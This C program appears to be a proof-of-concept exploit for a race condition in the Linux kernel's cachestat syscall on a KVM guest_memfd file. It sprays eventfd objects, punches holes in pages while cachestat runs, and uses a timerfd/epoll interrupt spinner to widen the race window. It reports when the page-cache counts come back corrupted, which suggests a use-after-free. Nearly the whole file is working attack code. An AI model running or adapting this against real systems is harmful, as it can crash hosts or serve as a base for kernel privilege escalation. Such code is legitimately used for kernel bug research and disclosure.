#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>
#include <stdint.h>
#include <inttypes.h>
#include <sys/syscall.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/eventfd.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/kvm.h>
#include <linux/membarrier.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

struct cachestat_range { uint64_t off, len; };
struct cachestat {
  uint64_t nr_cache, nr_dirty, nr_writeback, nr_evicted, nr_recently_evicted;
};
#ifndef KVM_CREATE_GUEST_MEMFD
struct kvm_create_guest_memfd {	uint64_t size, flags,	reserved[6]; };
#define KVM_CREATE_GUEST_MEMFD	_IOWR(KVMIO,  0xd4, struct kvm_create_guest_memfd)
#endif

static int fd_main, fd_otherfile;

static void touch_page(int fd, long i) {
#if 0
  SYSCHK(pwrite(fd, "A", 1, i*0x1000));
#else
  SYSCHK(fallocate(fd, FALLOC_FL_KEEP_SIZE, i*0x1000, 0x1000));
#endif
}
static void flush_lruvec() {
  SYSCHK(munmap(SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)), 0x1000));
}
static void zap_page(int fd, int i) {
  SYSCHK(fallocate(fd, FALLOC_FL_PUNCH_HOLE|FALLOC_FL_KEEP_SIZE, i*0x1000, 0x1000));
}

static void epoll_add(int epfd, int fd) {
  struct epoll_event ev = { .events = EPOLLIN };
  SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev));
}

static unsigned long ts_to_u64(struct timespec *ts) {
  return ts->tv_sec * (uint64_t)1000000000 + ts->tv_nsec;
}
static uint64_t time_u64(void) {
  struct timespec ts;
  SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts));
  return ts_to_u64(&ts);
}
struct timespec get_mono_time(void) {
  struct timespec ts;
  SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts));
  return ts;
}

static volatile int race_signal = -1;
static volatile uint64_t spin_time;

static void *thread_fn(void *dummy) {
  while (1) {
    touch_page(fd_main, 1);
    flush_lruvec();

#if 1
    //prespam
#define NUM_PRESPAM 1800
#define NUM_FDS     2000
    int fds[NUM_FDS];
    for (int i=0; i<NUM_PRESPAM; i++)
      fds[i] = SYSCHK(eventfd(0, 0));
#endif

    race_signal = 0;
    while (race_signal == 0) /*spin*/;
    uint64_t time0 = time_u64();
    while (time0+spin_time > time_u64()) /*spin*/;

    zap_page(fd_main, 1);

    for (int i=NUM_PRESPAM; i<NUM_FDS; i++)
      fds[i] = SYSCHK(eventfd(0, 0));
    for (int i=NUM_PRESPAM+1; i<NUM_FDS; i+=2)
      SYSCHK(close(fds[i]));

    while (race_signal == 1) /*spin*/;

    for (int i=0; i<NUM_FDS; (i<NUM_PRESPAM)?(i++):(i+=2))
      SYSCHK(close(fds[i]));
    SYSCHK(syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0));
  }
}

#define NR_WATCHES 100
#define NR_EPFDS 500

int main(void) {
  struct rlimit rlim_nofile;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim_nofile));
  rlim_nofile.rlim_cur = rlim_nofile.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim_nofile));

  int kvm_fd = SYSCHK(open("/dev/kvm", O_RDWR));
  int kvm_vm_fd = SYSCHK(ioctl(kvm_fd, KVM_CREATE_VM, 0/*KVM_X86_DEFAULT_VM*/));
  struct kvm_create_guest_memfd kcgm = { .size = 0x2000, .flags = 0 };
  fd_main = SYSCHK(ioctl(kvm_vm_fd, KVM_CREATE_GUEST_MEMFD, &kcgm));
  touch_page(fd_main, 0);

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

#if 1
  // set up hardirq spinner, in case it helps with the race...
  int tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, TFD_NONBLOCK));
  int tfd_dups[NR_WATCHES];
  for (int i=0; i<NR_WATCHES; i++)
    tfd_dups[i] = SYSCHK(dup(tfd));

  int epfds[NR_EPFDS];
  for (int i=0; i<NR_EPFDS; i++)
    epfds[i] = SYSCHK(epoll_create1(0));

  for (int i=0; i<NR_EPFDS; i++) {
    for (int j=0; j<NR_WATCHES; j++)
      epoll_add(epfds[i], tfd_dups[j]);
  }
#endif

  uint64_t tv_nsec = 0;
  while (1) {
    struct cachestat_range range = { .off = 0, .len = 0x2000};
    struct cachestat cstat = {};

    while (race_signal != 0) /*spin*/;

    tv_nsec += 10;
    tv_nsec %= 1000UL * 1000 * 1000;
    struct itimerspec its = {
      .it_value = {
        .tv_nsec = tv_nsec
      },
    };
    uint64_t time_before_arm = time_u64();
    race_signal = 1; /* 1 means go */
    SYSCHK(timerfd_settime(tfd, 0, &its, NULL));

    uint64_t time_before_cachestat = time_u64();
    if (syscall(451/*__NR_cachestat*/, fd_main, &range, &cstat, 0))
      err(1, "cachestat");
    uint64_t time_after_cachestat = time_u64();
    if (tv_nsec > (time_after_cachestat-time_before_arm)*2)
      tv_nsec = 0;

    race_signal = 2; /* 2 means do cleanup */

    uint64_t arm_time = time_before_cachestat - time_before_arm;
    uint64_t stat_time = time_after_cachestat - time_before_cachestat;
    printf("\rarm_time=%8lu stat_time=%8lu tv_nsec=%8lu spin_time=%8lu", arm_time, stat_time, tv_nsec, spin_time);
    if (cstat.nr_cache > 2) {
      printf("\ncstat.nr_cache = 0x%016"PRIx64" (-0x%016"PRIx64") [tv_nsec=%lu]\n", cstat.nr_cache, -cstat.nr_cache, tv_nsec);
    }
    spin_time = arm_time + stat_time/2;
  }
}
